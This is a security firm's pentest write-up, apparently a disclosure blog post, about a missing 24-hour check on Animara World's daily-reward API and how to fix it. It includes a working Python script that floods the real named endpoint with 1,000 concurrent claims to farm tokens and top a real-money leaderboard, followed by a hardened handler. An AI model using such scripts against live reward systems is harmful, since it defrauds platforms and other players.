Pentesting Animara World
Uncovering a Critical Vulnerability in Animara World’s Daily Rewards
At Borg Security, our mission is to identify and address vulnerabilities that threaten the integrity of digital platforms. During a recent assessment of Animara World, we discovered a significant flaw in its daily reward system—a vulnerability that allowed attackers to bypass restrictions, gain an unfair advantage, and earn real money in prizes by exploiting the system.
About Animara
Animara is a virtual world platform that integrates blockchain technology, NFTs, and various game mechanics such as Tap to Earn, Play to Earn, and Hunt to Earn. These features are designed to engage users across gaming, virtual reality, and digital art spaces.
The Issue
Animara World’s daily reward system grants players golden tokens to upgrade biomes and earn Explora points, which determine leaderboard rankings. Each player is meant to receive one token every 24 hours. However, we uncovered a critical oversight: the backend system did not enforce this restriction.
Attackers could exploit this gap to repeatedly claim tokens, amassing resources far beyond what was intended. This not only disrupted fair play but also posed a financial risk, as top leaderboard positions awarded real-money prizes, including $30,000 USDC.
How the Exploit Worked
The vulnerability was caused by an API endpoint that failed to verify whether the reward had already been claimed within the last 24 hours. By automating requests, attackers could repeatedly claim tokens and use them to upgrade biomes, rapidly increasing Explora points and leaderboard positions.
Here’s a simplified example of how this could be exploited:
import requests
from concurrent.futures import ThreadPoolExecutor

# The request body carries only the caller's ID token (a JWT); nothing in
# it, and nothing on the server, records whether today's reward was claimed.
json_data = {'data': {'idToken': '<your_jwt_token>'}}

def send_request():
    response = requests.post(
        'https://us-central1-animara-38a73.cloudfunctions.net/dailyLogin',
        json=json_data,
        verify=False,  # as in the original script: TLS certificate checks disabled
    )
    print(response.text)

# 1,000 claims sent from 50 worker threads; every one is granted because the
# backend never checks the time of the last claim.
with ThreadPoolExecutor(max_workers=50) as executor:
    executor.map(lambda _: send_request(), range(1000))
Using an automated script, attackers could bypass the 24-hour limit, generating large amounts of in-game currency and unfairly dominating the leaderboards.
An API endpoint dispensing daily rewards failed to validate whether claims were duplicated. Attackers exploited this by automating requests to collect unlimited tokens, using them to boost Explora points and dominate leaderboards.
By running the script, we managed to climb to 1st place on the leaderboard in a few minutes.
The Consequences
This vulnerability disrupted Animara World’s ecosystem, creating an uneven playing field where attackers could dominate leaderboards and overshadow legitimate players. The exploit not only devalued the efforts of honest participants but also undermined the platform’s competitive integrity and user trust. With real-money prizes at stake, the financial implications were serious, and restoring confidence became essential to preserving the platform’s reputation.
Mitigation Steps
Addressing the vulnerability required reinforcing security on both the frontend and backend. Backend validation is essential to enforce restrictions such as the one-claim-per-24-hours limit, while monitoring API activity helps detect abuse. Frontend measures, such as rate limiting, can add an extra layer of protection but must complement strong server-side checks. Together, these practices help prevent similar exploits.
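As an added illustration, not Animara's code or part of the original assessment, the following shows how a server-side handler for a dailyLogin-style endpoint can enforce the 24-hour window. The token table and store are constructed stand-ins; the lock stands in for a database transaction, which matters because a plain read-then-write check would still let a burst of concurrent requests like the 50-thread script above all pass before any of them writes.

```python
import threading
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime, timedelta, timezone

CLAIM_WINDOW = timedelta(hours=24)

# Constructed stand-in for ID-token verification (token -> user id). A real
# backend verifies the JWT's signature and expiry and derives the user from it.
_VALID_TOKENS = {"tok-alice": "alice", "tok-bob": "bob"}

def verify_id_token(id_token):
    return _VALID_TOKENS.get(id_token)

class DailyRewardStore:
    """Server-side record of each user's last claim time and token balance.
    The lock stands in for a database transaction: the read of the last claim
    and the write of the new one must be one atomic step, otherwise concurrent
    requests can all pass the check before any of them writes."""

    def __init__(self):
        self._last_claim, self._balance = {}, {}
        self._lock = threading.Lock()

    def claim(self, user_id, now):
        with self._lock:
            last = self._last_claim.get(user_id)
            if last is not None and now - last < CLAIM_WINDOW:
                return {"ok": False, "error": "already_claimed",
                        "retry_at": (last + CLAIM_WINDOW).isoformat()}
            self._last_claim[user_id] = now
            self._balance[user_id] = self._balance.get(user_id, 0) + 1
            return {"ok": True, "tokens": 1}

    def balance(self, user_id):
        return self._balance.get(user_id, 0)

def daily_login(store, request_json, now=None):
    """Hardened handler for a request shaped like the script's json_data."""
    user_id = verify_id_token(request_json.get("data", {}).get("idToken"))
    if user_id is None:
        return {"ok": False, "error": "unauthenticated"}
    return store.claim(user_id, now or datetime.now(timezone.utc))

def flood(store, request_json, n=1000, workers=50):
    """Replay the request n times from a thread pool; count granted claims."""
    with ThreadPoolExecutor(max_workers=workers) as ex:
        results = list(ex.map(lambda _: daily_login(store, request_json), range(n)))
    return sum(1 for r in results if r["ok"])
```

Replaying the request from a thread pool against this handler yields exactly one granted claim per user per window, and the rejected responses carry a retry time instead of a token.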
Lessons Learned
This case highlights the importance of robust backend validation and comprehensive security practices. Even seemingly minor oversights can lead to significant vulnerabilities, affecting both user trust and financial stability.
How Borg Security Can Help
At Borg Security, we specialize in uncovering and addressing vulnerabilities across digital platforms. Our expertise ensures your systems are secure, your users are protected, and your reputation remains intact. Contact us today to learn how we can help safeguard your platform against emerging threats.